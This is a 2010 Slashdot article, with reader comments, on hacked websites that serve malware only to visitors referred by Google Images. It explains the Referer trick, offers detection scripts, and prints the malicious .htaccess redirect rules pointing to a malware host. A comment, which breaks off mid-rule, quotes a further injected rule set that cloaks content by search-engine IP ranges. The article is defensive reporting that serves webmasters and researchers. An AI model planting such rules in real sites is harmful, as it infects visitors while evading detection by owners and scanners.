Image Searchers Snared By Malware

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections, and the training procedures for hosting-company abuse-department staffers, will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that tradingblox.com had been hacked, and pages had been installed on the server that would serve malware in an unusual way: if the page was being viewed in a frame loaded from Google Images, or as a result of a click-through from Google Images, the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (say, as a result of typing the URL into your browser), the malware-loading code would not be served. That means that if you were to telnet to port 80 on the www.tradingblox.com server and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so the latter request will no longer return the malware code.) The web server would only serve the infected content if "images.google.com" specifically was sent as the referrer; "www.google.com" by itself would not trigger it.
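The two requests above can be scripted instead of typed into telnet by hand. The following Python sketch (a hypothetical illustration, using the hostname and path from this incident, which has since been cleaned up) builds the same two raw HTTP/1.1 requests, with and without the spoofed Referer:

```python
def build_request(path, host, referer=None):
    """Build a raw HTTP/1.1 GET request string, optionally adding a Referer."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    if referer:
        lines.append(f"Referer: {referer}")
    lines.append("Connection: close")
    # HTTP headers are CRLF-separated and end with a blank line
    return "\r\n".join(lines) + "\r\n\r\n"

# The "clean" request -- the server returned the normal page for this one
clean = build_request("/tradingblox/courses.htm", "www.tradingblox.com")

# The "poisoned" request -- at the time, this one triggered the malware payload
poisoned = build_request("/tradingblox/courses.htm", "www.tradingblox.com",
                         referer="http://images.google.com/")
```

Either string could then be sent over a plain TCP socket to port 80, exactly as in the telnet session described above.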

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of UnmaskParasites.com, a site that checks websites for malware infections, says that he had seen pages before that would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was served only if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that many more sites are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the company hosting tradingblox.com showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he may modify his site-checking script so that, in addition to the other checks it performs, it will request a page with "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
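The check Sinegubko describes could be implemented roughly as follows. This is a hypothetical sketch, not UnmaskParasites' actual code: fetch the page twice, once plainly and once claiming to arrive from Google Images, and flag the page if the two responses differ. The fetch function is injected as a parameter so the logic can be exercised without live network access (the `fake_fetch` server below is invented for illustration).

```python
def looks_cloaked(url, fetch, referer="http://images.google.com/"):
    """Flag a page that serves different content to Google Images visitors.

    `fetch` is any callable (url, headers) -> body string; injecting it
    lets the check run against a real HTTP client or a test double.
    """
    plain = fetch(url, headers={})
    referred = fetch(url, headers={"Referer": referer})
    # A trivial byte-for-byte comparison; a real tool would normalize
    # dynamic content (timestamps, rotating ads) before diffing.
    return plain != referred

# Simulated infected server: injects an exploit frame only for
# visitors who appear to come from Google Images.
def fake_fetch(url, headers):
    page = "<html><body>Normal course listing</body></html>"
    if headers.get("Referer", "").startswith("http://images.google.com"):
        page += "<iframe src='http://search-box.in/in.cgi?4'></iframe>"
    return page
```

Running `looks_cloaked("http://www.tradingblox.com/tradingblox/courses.htm", fake_fetch)` against this simulated server returns `True`, which is exactly the behavior the real infected site exhibited.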

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
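Given that evasion, a thorough checker shouldn't probe with just one Referer value. A hypothetical sketch of the candidate list such a tool might cycle through, covering both the referrers that triggered this payload and the "webmaster checking their own site" searches that the hack deliberately served clean content to:

```python
def candidate_referers(domain):
    """Referer values worth trying when probing `domain` for cloaked malware.

    Illustrative list only: plain Google / Google Images / Yahoo Images
    referrals (which triggered this payload), plus searches mimicking a
    webmaster auditing their own site (which some hacks deliberately
    behave themselves for, as described above).
    """
    return [
        "http://www.google.com/",
        "http://images.google.com/",
        "http://images.search.yahoo.com/",
        # Mimic the webmaster's own search for their site:
        f"http://www.google.com/search?q=site:{domain}",
        f"http://www.google.com/search?q=inurl:{domain}",
    ]
```

If the responses differ across any pair of these (or versus a request with no Referer at all), the page deserves a closer look.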

This also makes it harder to report the exploits to the hosting companies that host infected websites. If the webmaster of an infected site doesn't respond to complaints, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. I have been hosted by several companies where the tech-support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage; go to this page and view the source code, and you can see the malicious code," they would have known what to do. But if I'd had to tell them to follow the steps above -- telnet to port 80 on the infected website and type a few lines to mimic a browser sending HTTP request headers -- I probably would have lost them at "telnet." (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain I had hosted with them; about half of the hosting companies agreed to switch the nameservers -- essentially transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
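If you're auditing your own .htaccess files for this class of hack, the telltale shape is a RewriteCond that branches on HTTP_REFERER and mentions a search engine. A rough heuristic scanner, sketched in Python (the patterns are illustrative, not a complete signature list -- legitimate rules occasionally match too, so treat hits as leads, not verdicts):

```python
import re

# Rewrite conditions keyed on the Referer that name a search engine are
# rarely legitimate -- this is exactly the shape of the injected rules above.
SUSPICIOUS = re.compile(
    r"RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(google|yahoo|bing)",
    re.IGNORECASE)

def suspicious_lines(htaccess_text):
    """Return (line number, text) for Referer-keyed rewrite conditions."""
    return [(n, line.strip())
            for n, line in enumerate(htaccess_text.splitlines(), start=1)
            if SUSPICIOUS.search(line)]

# The rules found on the infected server, quoted from the article:
sample = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
"""
```

Running `suspicious_lines(sample)` flags lines 3 and 4 -- the two injected conditions.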

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of the 2009 break-ins on Linux-hosted sites were caused by malware surreptitiously installed on people's Windows PCs, stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen: if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions is keeping your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting-company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse-report handlers will have to be trained to understand what it means that a website shows infected content only in response to a certain "Referer:" header, and ideally should know enough about networking and command-line tools to follow the "telnet" instructions above. (Most expensive dedicated hosting companies, like Rackspace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get a domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

  • Should Be Shot (Score:3, Insightful)

    by Anonymous Coward on Thursday February 04, 2010 @10:35AM (#31022778)

    Malware and Virus authors should be lined up against a wall and shot. They are cancers and need to be irradiated.

    • by sycodon ( 149926 )

      I mean eradicated...although irradiated would probably work well too.

      • Re: (Score:3, Insightful)

        by Spyware23 ( 1260322 )

        What we -should- do is focus on things that we can actually benefit from. Instead of mass-murder, why not fix the internet by fixing javascript (ie. dis, fucking, allow, whitelist basis only), fixing flash (bye), fixing CSS (stop reading my history and stop scanning my ports!) and fixing HTML so we don't need to rely on stupid things (flash, silverlight, the thing Google made) to make browsing an enjoyable experience.

        I can deliver you a browser that is virtually unexploitable. Firefox running with NoScript,

        • How do you expect to "fix" HTML to provide advanced features after we've gotten rid of javascript, Flash, and Silverlight? And what does CSS have to do with reading your history and scanning your ports?
          • Everything. I'll just throw a couple of links at you and then you can go be scared.

            http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

            I suggest that if you want to be up to date with the web app security world, you should keep reading blogs of security researchers, and perhaps security research-related fora (like sla.ckers.org).

            As for your first question, I suggest you read the HTML 6 specs that have been presented. Also, remember that a browser is just a t

            • Re: (Score:3, Informative)

              I'll just throw a couple of links at you and then you can go be scared.
              http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

              Well, I just visited both of your links, and am unimpressed and unscared.

              The CSS history one gave a very short list of what looked like guessed web sites which were mostly wrong (hint: I never visit msn or ebay or myspace, and it's months since I visited yahoo). It looked like blind guesswork, as the list had google, but not slashdot, for instance. Clicking through to see what information they claim to have logged, I encountered an empty list, not even the bogus guesses of wrong web sites that were on th

              • Forgot to mention: Javascript, Java, and Flash were all enabled when I visited your silly "scary" links.
              • Re: (Score:3, Informative)

                That list is the sites being tested, if it can detect any of them in your history, it shows red text in a box next to that item. The exploit can only check a specific list of items. The problem is a UI/implementation one, not a problem with the concept.

                • That list is the sites being tested, if it can detect any of them in your history, it shows red text in a box next to that item.

                  Perhaps you should check your code again.
                  It showed the red "visited" text in a box beside all of the incorrect IP addresses and the 127.0.0.1:8080 combination. I reiterate that my LAN is not on 192.168.0.* or 192.168.1.* but the page claims that I visited addresses 192.168.0.1 192.168.0.2 192.168.1.1 and 192.168.1.2 which is clearly impossible. In fact, it does that even when I use a PC which is directly connected to a public IP, and not on our home LAN.
                  FYI we have 8 fiber ports at home, each with a publ

                  • It isn't my code.
                    When I visited it, it correctly showed that I hadn't visited any of those IP addresses. The other page correctly identified which sites I had visited, even after clearing my history and after re-visiting them.

            • by abigor ( 540274 )

              Neither of those links provided any kind of accurate information. Very non-scary, I have to say.

              • 1 out of 5 websites were right, and honestly John Edward would have gotten at least 2 right, that includes the google that the site actually got right.
        • The reason this will never happen (and it should) is because we have art students, not engineers, designing our websites, and thus calling the shots.

          Some parts of computing should just not be done by non-technical users, designing secure systems is one of them.

          • Re: (Score:3, Interesting)

            Okay, only a Professional Software Engineer can design webpages or write code. In BC, that's an actual discipline for Engineers. (I'm Electrical myself; one of my friends has her P.Eng in Software, and my alma mater was one of the first to offer it.)

            See how that works?

The real problem is really your attitude, not the fact that "artsy-fartsies" are writing webpages in Dreamweaver. We can talk about the relative merits and security of Windows / OS X / Lunix all day (which, really, is what /. is all about) but

            • I'm not really sure what you are running off about, but I'm fairly sure that at least a fair chunk of it is unrelated to my post which you are responding to...

I was simply indicating that getting rid of plugins like flash, locking down javascript, and in general getting the separation of data and executable code right is never going to happen because the people who are currently calling the shots and driving the market either do not understand computer security, or do not make it a priority.

              In my opinion, t

            • "We're outgunned and outnumbered."

              Because of that, I can see a future where active monitoring/detection of system changes is going to become more important. Maybe even services that either log into your machine and look at file size, diff, etc.. or actually make requests of your website, mimicking every possible thing a user could do, and look for unintended outcomes (file automatically downloading, for instance.)

          • Re: (Score:2, Insightful)

            by nomadic ( 141991 )
            Some parts of computing should just not be done by non-technical users, designing secure systems is one of them.

If those non-technical users are able to create security holes, then that's the engineer's fault.
            • Re: (Score:3, Insightful)

              by Sir_Lewk ( 967686 )

I'm not saying that nontechnical users create security flaws, I'm saying that they demand features that cause security flaws, and the engineers who know better are not in positions to deny them the features. If a highly paid media PHB demands that the website for [NEW HIT MOVIE] be made entirely in Flash, a lowly engineer pointing out that Flash is insecure is not going to get anywhere.

        • Honestly, just making javascript operate on a whitelist basis only would reduce online malware attacks by about 99.5%

          I realize that I am far from an average user, but I have been using computers for 30 years (the last 15 using Windows) and have never gotten a virus, worm, or any other form of malware on a single computer I have ever owned despite not really using AV software, always logging in as admin, and spending an inordinate amount of time acquiring software on 119th St.

          I don't deny that these things exist but obviously the user is the weakest link as everything you have said is already available to any user who know

          • Question: What is your process to determine that every computer you've ever owned has never been compromised by malware? Are you doing some kind of checksum on system function and monitoring each inbound and outbound network packet? Not all malware generates a big red flashing skull on your screen. The malware that operates quietly and gives no indication you have a problem is the stuff you need to worry about. Malware frequently actively attacks anti-virus software on top of this; leading to an increa
        • So - I'm sitting here, reading about this newest manifestation of exploitable exploits, and wondering: "how does all this affect Debian?"

          Then you offer up some solutions that would actually start to FIX THE PROBLEMS.

          No script - check.

          Adblock plus - check.

          Turn off Flash - check.

          Ditch silverlight/moonlight - check.

          Disable Java - check.

What's left? Oh yeah - don't click on obvious bogus links, and don't agree to download a virus scanner. Like I really need one on Debian.

          What does that leave? Hmmmm. A damn

          • You are well informed and protected, but even plain CSS is an attack vector. Yes, to be safe, you need to disable CSS http://search.slashdot.org/comments.pl?sid=1537058&cid=31023480 [slashdot.org]. Also, extensions like LocalRodeo, SafeHistory and SafeCache might be worthy add-ons to your arsenal. Although some of those extensions might be deprecated/unusable in the latest version of Firefox/Iceweasel (even with Nightly Tester Tools).

        • Firefox running with NoScript

          Just to whinge for a moment, Firefox+NoScript really get on my tits. Seems like it wants to add a new update to one or the other every bloody day.

Yes, because overreacting and making the punishment much worse than the crime is ALWAYS a good idea.

      I also say execution for jaywalking, littering, and spitting in public.
      • by sycodon ( 149926 )

Are you sure it's an overreaction?

        • Re: (Score:1, Troll)

          Yes. Any other dumb questions?
          • All your post tells me is that you never caught Vundo on your computer. Your attitude toward bored, Russian malware writers drastically changes. The first time you get it, it's as painful as a digital kidney stone -- and someone, somewhere is making money from your suffering.
            • Cleaned up Vundo many times at work. Yes it can be tricky, but I still maintain that it is not worth murdering someone over. I don't have any love for malware writers, but I do have lots of love for the punishment fitting the crime, and tons of love for not having stupid knee-jerk over reactions to things.
    • Only if the malware directly caused loss of life, or raped some kids or something, would I even consider such a punishment fair.

      No, messing up your PC, making your admin job harder, or even stealing your identity and buying a mansion in your name should not be a capital crime.

      • by sycodon ( 149926 )

        I'm sure many of Madoff's investors would disagree.

        While my original comment was somewhat tongue-in-cheek I think this game between the virus writers and anti-virus writers is far more serious than most people realize.

        Having your identity stolen and your credit rating ruined can be a life changing event. Lawsuits and even jail time for you are possibilities.

        These days, having you computer hacked into, damaged, or data deleted can the be the equivalent of someone breaking into your home and destroying things

  • orly? (Score:5, Insightful)

    by Pharmboy ( 216950 ) on Thursday February 04, 2010 @10:39AM (#31022834) Journal

While I use Windows on the desktop to manage my linux servers like most admins, I find it hard to believe that 90% of all break-ins were caused by an administrator's Windows box getting owned first, to capture their password/login info. That means only 10% of the boxes were directly attacked and owned, yet my logs show an overwhelming number of attempts to do just that. This would mean that 90% of the pwned Linux servers are really the fault of Microsoft Windows, and just smacks of bogus accounting.

    • Re: (Score:3, Interesting)

      by T Murphy ( 1054674 )
      I don't know linux and the malware fight very well, but are those direct attacks intended to work on Windows machines, so that those 10% are the only attacks that even work against a linux box?

      As a slashdot reader who doesn't know much about linux, it often sounds like linux is this magical program that can't do wrong, so clarification for the under-informed would be helpful.
      • I have no doubt that malware is likely for linux, but unlike Windows, you can't guarantee a compatible vector for every linux box. Read for instance the problems Google has had with Chromium porting to linux. They couldn't even expect a consistent thread API to be there, depending on whether you were a 2.4 kernel, a 2.6 kernel with pthreads, a 2.6 kernel with NPTL only, . The cost/benefit ratio is just not there for someone to put the time into this kind of attack vector. The code written would have to be b
        • It is like the difference between a job that earns $6 per hour doing ditch digging or a job that earns $300 per half hour just to tell someone they are crazy.

          Our half hour is up. The secretary will handle your bill.

        • You just use Perl. It's trivial. And as an added bonus, obfuscation is a first-class language feature.

        • Keep in mind that the vast majority of these attacks are not going after kernel flaws, they are typically going after PHP or MySQL flaws, or default PHP/MySQL settings more than anything. Some obvious Windows exploits are tried, but not that many as it is easy to test if a server is Windows or Linux based in a script, so that is rare in my logs. I haven't run FTP in years, but I remember a bunch of attempts using dictionary attacks when I did.

          Of course, the most common attack is simply SSH logins using co

    • by Yaa 101 ( 664725 )

      Why would you use a Windows desktop to manage Linux servers? I think that is totally ineffective.

But hey, it's your setup and I won't be bothered with it.

      • I would imagine it is incredibly common.

You can manage it all you want with putty and still connect to your company's Exchange server with outlook.

        I'm not a professional admin...but in school I did a bit of admin work on some linux/BSD servers. Most of the work I did was probably sshed in from a windows box either at home or in our little office (before I installed linux on a machine there); I only admined from linux if I was fixing something from class with my linux laptop or if I was standing at a [*

        • Re: (Score:3, Informative)

          by swb ( 14022 )

          Incredibly common bordering on likely the outright majority.

          For one, its likely that most companies will have some kind of Windows infrastructure and/or Windows application requirements and thus will hand out Windows based laptops/desktops. Admins with a OSS religious affiliation may end up overwriting these systems with Linux or building their own in parallel, but controls/obstacles/requirements/misc bureaucratic bullshit may stop all but the most senior from being able to do this or make it too much of

    • This would mean that 90% of the pwned Linux servers are really the fault of Microsoft Windows

You mean to say that such servers' pwned state is the result of improper security practices on the part of a Windows user. [/pedant]

      In all likelihood, I don't see why this wouldn't be the case. Unless these sites are running some type of publicly available CMS product, like Wordpress or Joomla, chances are good that these sites are uploaded via FTP. There was a feature on Slashdot, it may have been Mr. Hassleton's writing, too, saying that certain types of trojans will scan your incoming and outgoing

    • by nasch ( 598556 )

      That means only 10% of the boxes were directly attacked and owned, yet my logs show overwhelming amount of tries to do just that.

      And how many were successful? I think they're talking about the times a machine is compromised, not how many times it's attacked.

  • The free antivirus packages are fine, there is no need to pay for one.

    • Re: (Score:3, Interesting)

      by Pojut ( 1027544 )

      Agreed. I used AVG for years, and when it became too bloated I moved to Avast. Haven't had a virus on my windows box in close to five years.

      • I haven't used any antivirus software on my Win2K box in the past 9 years and NEVER had a virus in that time.

        Firefox with Adblock Plus, Noscript, and Flashblock. That's it!

        I noticed some sluggish performance recently and suspected malware or a virus. I installed MalwareBytes' Anti-Malware, Clamwin, and Spybot S&D, ran them, and all indicated my system was clean.

        The problem turned out to be a badly fragmented hard drive (haven't defragged since 2001 or 2002!)

        • by RulerOf ( 975607 )

          I haven't used any antivirus software on my Win2K box in the past 9 years and NEVER had a virus in that time.

          I used to do the same thing, specifically because I didn't want to take the performance hit I have always associated with running an AV product.

          Fast forward a few years, I'm running a dual core chip with gobs of ram and (though I know I'm a minority on this one) an extremely fast hardware RAID controller, I can drag and drop 100GB of data, defrag an array, and run a virus scan... while playing a video game.

          In that time, my AV has caught a few things I didn't suspect were infected, and a few I had expected

        • by Pojut ( 1027544 )

          As I said previously, I haven't had a virus detected nor have there been any warning signs of one in literally years. The only reason I still run the software is because I'm paranoid.

          Remember...just because you are paranoid doesn't mean they aren't after you!

      • by G00F ( 241765 )

I have seen way too many people with AVG installed, with up-to-date definitions, who have viruses anyway. I now suggest Avast as a free solution, or even better, pay for Trend Micro or Kaspersky.

  • by santax ( 1541065 ) on Thursday February 04, 2010 @10:41AM (#31022850)
    Man, this is how I view my porn, and I use that method just to be safe! What now :(
    • Re: (Score:3, Insightful)

      by Thanshin ( 1188877 )

      Man, this is how I view my porn, and I use that method just to be safe! What now :(

      A live disc?

    • Re: (Score:1, Funny)

      by Anonymous Coward
      1: Get a usenet account
      2: Get a good binary usenet reader
      3: ???
      4: pro(n)fit!
  • Immunity ? (Score:1, Interesting)

    by Anonymous Coward

I visited one of these sites, and because I'm a limited user, the malware didn't install.
  So I question how much of this happens because consumers foolishly run as owner/admin or disable UAC. Those who run Linux or a Mac are likely to be immune, and probably in that order, Linux machines being much more secure.

    • by Nadaka ( 224565 )

I don't think we have enough information to "know" that linux is "much more secure" than mac. Both have a handful of known exploits (vs. an overflowing truckload of exploits available for windows). Neither one is proof against infection.

  • by Itninja ( 937614 ) on Thursday February 04, 2010 @10:46AM (#31022918) Homepage
    For all that are hypersensitive to misspellings. The term 'referer' is not [wikipedia.org] a typo (at least, not in this article).
    • Re: (Score:2, Funny)

      by Tablizer ( 95088 )

      Wikipedia: "[standard] co-author Roy Fielding has remarked that neither "referrer" nor the misspelling "referer" were recognized by the standard Unix spell checker of the period..."

      So if it's not in Unix, it doesn't exist, eh? ;-)
         

  • by T Murphy ( 1054674 ) on Thursday February 04, 2010 @10:47AM (#31022924) Journal

RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]

    I don't see Bing on there.

  • Okay, insert obligatory "One more reason not to use Windows" comment here, after all, this is Slashdork.
    Yup, Linux and OSX can get infected as well, but it's harder to do so. Especially if you approach it from the point of view that it can happen to you. If you just have to use a Windoze tool, do it via a VM of some sort, pick your fave brand of VM to do so. Some tools (native VMware VI management tools) are only available for Windoze, so I use a VM to run those tools. Other than that,

    • Slashdork...Windoze...really? Really!?!? Why don't you throw in some fake backspace characters, a "meh," and a <sigh> while you're at it?
    • Note that using a Linux VM on a Windows host is *not* the fix. Using a Windows VM on Linux is *not* a fix either. Your passwords can be gathered in either case*.

as WOPR said: "The only way to win is not to play [with windows.]"

      * I am realizing there is a way to semi-secure things. If you use a proxy to provide passwords to sites, you never have to type a password in. The accounts could be gathered according to a database, and once you got prompted for a password, the proxy could present an on-screen keyboar

  • Another one (Score:5, Interesting)

    by The Redster! ( 874352 ) on Thursday February 04, 2010 @10:53AM (#31022992)
    This is actually not a new trick. A guy I know had his website serving up an evil redirect about half a year ago -- at random, something like every 1 in 5-6 requests, and then still only with a Google referrer. He even asked me to capture the header with the redirect because his hosting company wouldn't believe him (they eventually fixed it).
  • by MonsterTrimble ( 1205334 ) <monstertrimble.hotmail@com> on Thursday February 04, 2010 @10:54AM (#31023006)
    Shouldn't we be happy about this? I mean, they aren't even TRYING to attack a regular surfer, but only one who comes through google images. That means they are trying a pretty limiting technique, which I presume is because all other methods will not yield as good results. To me that means people are getting better at this anti-virus thing.
    • by HTH NE1 ( 675604 ) on Thursday February 04, 2010 @11:14AM (#31023290)

      Shouldn't we be happy about this? I mean, they aren't even TRYING to attack a regular surfer, but only one who comes through google images.

      Yeah, because everyone knows Google Images users are Slightly Irregular.

      That means they are trying a pretty limiting technique which I presume is because that all other methods will not yield as good results.

      Or it's a proof-of-concept implementation being tested for more insidious deployment, say attacking only those who are coming from a (your!) bank's domain, or a government site, or a link from Google Mail embedded in an e-mail's image fetch to confirm your identity as a Chinese dissident.

    • This is just one attack technique among many being used successfully.

    • by RulerOf ( 975607 )
      It's not that hitting all surfers would yield fewer attack victims in a given amount of time, it's that hitting all of them means that the malicious code is more likely to get caught by an admin. If the malicious code is only active for 24 hours but hits everyone, chances are low that such code will actually result in a successful attack. However, if it can linger for longer periods of time, months or years, and simultaneously evade safe-browsing filters provided by MS/Google/Mozilla, that's likely going
  • by DesScorp ( 410532 ) on Thursday February 04, 2010 @10:58AM (#31023064) Journal

    I've got an old Mac at work I use for various tasks, but I use Windows at home. And it's loaded up with all of the standard defenses... firewalls, anti-virus, Malwarebytes, Spybot S&D, you name it. And yet Windows boxes are still getting owned. And it's not even necessarily "bad" websites that are spreading this stuff... porn, torrent sites, etc. There are a lot of websites out there that have no idea that they've been owned, and that they're spreading this filth to Windows machines. The latest trojans, like "Internet Security 2010", infect Windows boxes so badly that it often takes longer to completely clean them than it does to just throw up your hands and decide to nuke and pave.

    I know Macs will eventually be a bigger target when they get more of the market, but after one of my family machines became infected... again, despite having all of the necessary security software... I decided it was time to spring for a Mac Mini at home. Better that the wife and kids learn a different OS than Daddy pulling all of his hair out because of yet another damn trojan... despite best efforts to the contrary.

    • Re: (Score:1, Interesting)

      by Anonymous Coward

      Why not just patch your machine and save the extra money instead of buying OSX? Compare how often OSX patches its OSS software versus, say, Ubuntu.

    • by NatasRevol ( 731260 ) on Thursday February 04, 2010 @11:31AM (#31023506) Journal
      I've always said...Windows is cheaper if your time is worth nothing. Wipe & reinstall is your wasted time. That and fighting all those viruses/malware/spyware/etc.

      Macs aren't perfect, but you spend a LOT less time trying to make & keep your system secure.
      • Funny, I've only had one virus/spy-ware/mal-ware in my entire time using Windows, right from 3.11 to current. And that was my roommate getting his Windows ME machine pwnd and letting it sit on the network. I defrag my machine overnight once a month or so. I ran without an active AV scanner for over a year. As it is, just out of habit, I'll run Spy-bot once every few weeks, and I threw Avast on there, and run it too. Always overnight. Total time wasted? About 5 minutes setting them up.

        Now, on my Mac machine

        • by Ifni ( 545998 )

          I've wasted more time trying to make my Mac work properly than I have keeping my Windows box secure.

          Yes, but you've looked cooler doing it, and isn't that what REALLY counts?

    • If your kids are installing these trojans via warez, cursor packs, or other gizmos they will get your Mac Mini into trouble too. That is unless they don't have admin access. But why would you give your children admin access to any box?
  • The gratuitous comma tag is incredibly appropriate. It's important to remember that if we hope to keep the next generation of students adept at the English language [slashdot.org] we might want to set a good example.

    Since I've referenced poor grammar, there's a 99% chance I made a spelling or grammar error in this post.
  • Yeah, this is pretty scummy. But I've gotta admit, it's also pretty creative.
    • Yup, chuck these guys in prison for a year, then when they come out, hire them at $xyz000 a year, and get them to be that inventive with stopping others.
  • We got hit by this (Score:5, Informative)

    by hedronist ( 233240 ) * on Thursday February 04, 2010 @11:47AM (#31023700)

    We get so many 404s because of probes from random script kiddies that I tend to ignore that part of the daily log scan -- big mistake. (I have my own link checker so I know that all of the real URLs are correct and functioning.) It wasn't until the site owner said that we seemed to have dropped off the search results at Google that we knew something was wrong. I couldn't figure out why and spent quite a bit of time banging my head against random walls.

    Although I had looked at the logs, I was mostly looking for 500 errors. I finally started to focus on the 404s, and little bells started going off when I saw a whole bunch of them for msnbot. And then I saw a whole bunch for googlebot. And then I noticed that they were all under our /media path. I immediately started checking all of the URLs that had 404ed and they all worked fine. Google was also reporting that they were getting a 404 on our sitemap.xml. Shit! I tested it with their 'Test your URL' page and it worked, so I resubmitted it and ... it 404ed! WTF? (I'm still not sure why this got snarled with sitemap.xml, but it was involved.)

    I went and took a long, hot shower -- this is my place of refuge and deep thinking. The question was: what could cause all of these errors for the spider-bots, but not produce them for me or any normal human? I looked like a prune by the time it hit me: they weren't seeing the same pages/files I was. How could that happen? If this was a networking problem it would already be smelling like a firewall issue of some sort -- the unseen middleman.

    I should mention here that this is a Django site, which means I'm pretty much all over the URLs coming in ... except for /media, which are handled directly by Apache as static files. Apache ... hmmm ... !

    Apache's .htaccess file is probably the single most powerful file on your website, and you don't even see it when you do an 'ls'. I popped into the editor and I almost crapped my pants:

    RewriteCond %{HTTP_HOST} (^|www.)example.com
    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g|gif|png|zip|swf|doc|xls|pdf|ico|tar|gz|bmp|rar|mp3|avi|mpeg|flv)(\?|$)
    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$
    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]
